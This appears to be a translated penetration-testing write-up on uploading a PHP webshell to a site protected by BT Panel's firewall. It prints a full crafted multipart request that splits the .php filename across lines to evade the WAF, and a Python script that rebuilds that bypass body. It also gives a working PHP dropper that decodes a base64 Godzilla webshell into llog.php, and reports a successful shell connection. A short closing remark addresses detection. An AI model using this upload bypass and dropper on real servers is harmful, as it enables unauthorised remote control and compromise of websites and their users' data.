0x00: Background
The target has a file upload that only accepts jpg and png. Uploading a php file is intercepted by BT Panel (宝塔); any attempt to upload a .php gets the request blocked by BT Panel.
0x01: Bypassing the file-extension restriction
After uploading a few files with malformed extensions that rely on parsing quirks, it turned out that nothing uploaded that way gets executed, but files of any type can be uploaded. So the site itself applies no extension blacklist or whitelist; only BT Panel's firewall is intercepting our traffic, and that can be bypassed.
The tricks used in this case are:
- split the keyword php across lines;
- the multipart parser on the server side (PHP's, behind Apache) still accepts a tampered header such as Content-Disposition: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="BBBBBBBB"; name="file"; (the bypass request is shown below; the image data blocks could not be pasted, so text stands in for them);
- PHP code embedded inside the image data block, combined with the two tricks above, gets past the restriction.
POST /system/Upload/imgUpload HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
token: 7A5BE98BF2A1E8695E6E4CC806E886ED
Content-Type: multipart/form-data; boundary=---------------------------145660050014454973801680190631
Content-Length: 1341
Connection: close
Cookie: PHPSESSID=i6fe4bnvrnc50s4uh64rvmeol4

-----------------------------145660050014454973801680190631
Content-Disposition: form-data; name="width"

60
-----------------------------145660050014454973801680190631
Content-Disposition: form-data; name="height"

60
-----------------------------145660050014454973801680190631
Content-Type: image/gif
Content-Length: 253
X-Requested-With: XMLHttpRequest
Content-Type: image/png
Content-Disposition:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="BBBBBBBB"; name="file";
filename="1.p
h
p"

........[image data block]
<?php phpinfo();?>
........[image data block]
-----------------------------145660050014454973801680190631--
The upload succeeds; opening the file in the browser shows that phpinfo has been written successfully.
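As an added example (my code, not from the original post), the script below builds a multipart body laid out like the request above and shows the two halves of the bypass: a line-based signature of the kind a WAF applies to the raw request never sees the string filename="1.php", while a forgiving multipart parser joins the lines back together and hands the application exactly that filename. The boundary, image bytes and WAF regex are constructed stand-ins; the lenient parser is modelled on PHP's multipart header handling (main/rfc1867.c), where a header line that contains no ':' is appended to the preceding header value, which is the behaviour the post's request depends on. Confirm that behaviour against your own target rather than assuming it.

```python
import re

# Constructed values for this example: the boundary, image bytes and field
# layout are stand-ins, not the ones sent to the post's target.
BOUNDARY = b"---------------------------0123456789"
FAKE_IMAGE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16   # stand-in for a real image data block
PAYLOAD = b"<?php phpinfo();?>"


def disposition_lines(filename_pieces):
    """Header lines for the file part, laid out the way the post's request is:
    the header name alone on its line, a junk parameter ahead of name=, and
    the quoted filename spread over several lines with no leading whitespace.
    Only a parser that treats a line without ':' as a continuation of the
    previous header joins the pieces back into one filename."""
    pieces = list(filename_pieces)
    pieces[-1] += '"'                      # close the quoted filename on the last piece
    return [
        "Content-Disposition:",
        "A" * 48 + '="BBBBBBBB"; name="file";',
        'filename="' + pieces[0],
        *pieces[1:],
    ]


def build_body(filename_pieces):
    """Full multipart/form-data body: width/height fields plus the file part,
    with the PHP payload sandwiched between two image data blocks."""
    crlf = b"\r\n"
    delim = b"--" + BOUNDARY + crlf
    body = b""
    for field, value in ((b"width", b"60"), (b"height", b"60")):
        body += delim + b'Content-Disposition: form-data; name="' + field + b'"' + crlf + crlf + value + crlf
    body += delim + b"Content-Type: image/png" + crlf
    body += crlf.join(line.encode() for line in disposition_lines(filename_pieces)) + crlf + crlf
    body += FAKE_IMAGE + PAYLOAD + FAKE_IMAGE + crlf
    body += b"--" + BOUNDARY + b"--" + crlf
    return body


def naive_waf_blocks(body):
    """A signature of the kind a WAF applies to the raw request (our model,
    not BT Panel's real rule): a filename ending in .php on one header line."""
    return re.search(rb'filename="[^"\r\n]*\.php"', body, re.I) is not None


def lenient_headers(header_block):
    """Parse one part's header block the way a forgiving multipart parser does
    (modelled on PHP's main/rfc1867.c): a non-empty line with no ':' is
    appended to the value of the previous header instead of being rejected."""
    headers, key = {}, None
    for line in header_block.split(b"\r\n"):
        if b":" in line:
            name, _, value = line.partition(b":")
            key = name.strip().lower()
            headers[key] = value.strip()
        elif line and key is not None:
            headers[key] += line
    return headers


def uploaded_filename(body):
    """Filename the lenient parser recovers from the file part, or None."""
    for part in body.split(b"--" + BOUNDARY + b"\r\n")[1:]:
        header_block, _, _ = part.partition(b"\r\n\r\n")
        disposition = lenient_headers(header_block).get(b"content-disposition", b"")
        match = re.search(rb'filename="([^"]*)"', disposition)
        if match:
            return match.group(1).decode()
    return None


if __name__ == "__main__":
    for pieces in (["1.php"], ["1.p", "h", "p"]):
        body = build_body(pieces)
        print(pieces, "blocked by signature:", naive_waf_blocks(body),
              "| filename seen by lenient parser:", uploaded_filename(body))
```

The detection-side lesson is the mirror image of the bypass: a rule that inspects the raw request line by line must first unfold multipart headers the same way the application's parser does, otherwise the signature and the application disagree about what was uploaded.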
0x02: Bypassing BT Panel's traffic interception
1. Upload a harmless webshell. Here a Godzilla (哥斯拉) webshell is used, base64-encoded and uploaded as a .txt: since the firewall inspects the upload content, the shell is shipped inert, as base64 text, and is only decoded on the server. Once the upload succeeds, note the path of that .txt and write the following PHP code:
<?php
// Path of the base64-encoded Godzilla shell that was uploaded as a .txt
$path = "./";
$path = $path . "1263563381093601225271772528938354231314346470.txt";
echo $path;
// Read the text file and decode it back into the PHP webshell
$str = file_get_contents($path);
$str = base64_decode($str);
echo $str;
// Write the decoded shell out as llog.php next to this dropper
$handle = fopen("./llog.php", "w");
fwrite($handle, $str);
fclose($handle);
?>
2. Upload the PHP code that writes out the webshell. After it is on the server, request it once and llog.php is generated; llog.php is the Godzilla webshell. Requesting it confirms a new webshell now exists. Connect to it with Godzilla: connection successful.